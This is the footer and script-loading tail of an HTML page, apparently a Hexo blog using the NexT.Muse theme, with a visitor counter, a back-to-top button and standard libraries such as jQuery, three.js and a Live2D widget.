  <div class="theme-info">Theme – <a class="theme-link" target="_blank" href="https://theme-next.org">NexT.Muse</a> v6.4.0</div>






        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="site-uv" title="Total Visitors">
      <i class="fa fa-user"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
    </span>
  

  
    <span class="site-pv" title="Total Views">
      <i class="fa fa-eye"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
    </span>
  
</div>









        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    
	
    

    
  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>














  







  
  







  
  
    <script type="text/javascript" src="//cdn.jsdelivr.net/jquery/2.1.3/jquery.min.js"></script>
  

  
  
    <script type="text/javascript" src="//cdn.jsdelivr.net/velocity/1.2.3/velocity.min.js"></script>
  

  
  
    <script type="text/javascript" src="//cdn.jsdelivr.net/velocity/1.2.3/velocity.ui.min.js"></script>
  

  
  
    <script type="text/javascript" src="//cdn.bootcss.com/canvas-nest.js/1.0.1/canvas-nest.min.js"></script>
  

  
  
    <script type="text/javascript" src="/lib/three/three.min.js"></script>
  

  
  
    <script type="text/javascript" src="/lib/three/canvas_sphere.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=6.4.0"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=6.4.0"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=6.4.0"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=6.4.0"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=6.4.0"></script>



  



  










  





  

  

  

  

  
  

  

  

  

  

  

<script src="/live2dw/lib/L2Dwidget.min.js?0c58a1486de42ac6cc1c59c7d98ae887"></script><script>L2Dwidget.init({"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script></body>
</html>
<script type="text/javascript" src="/js/src/love.js"></script>
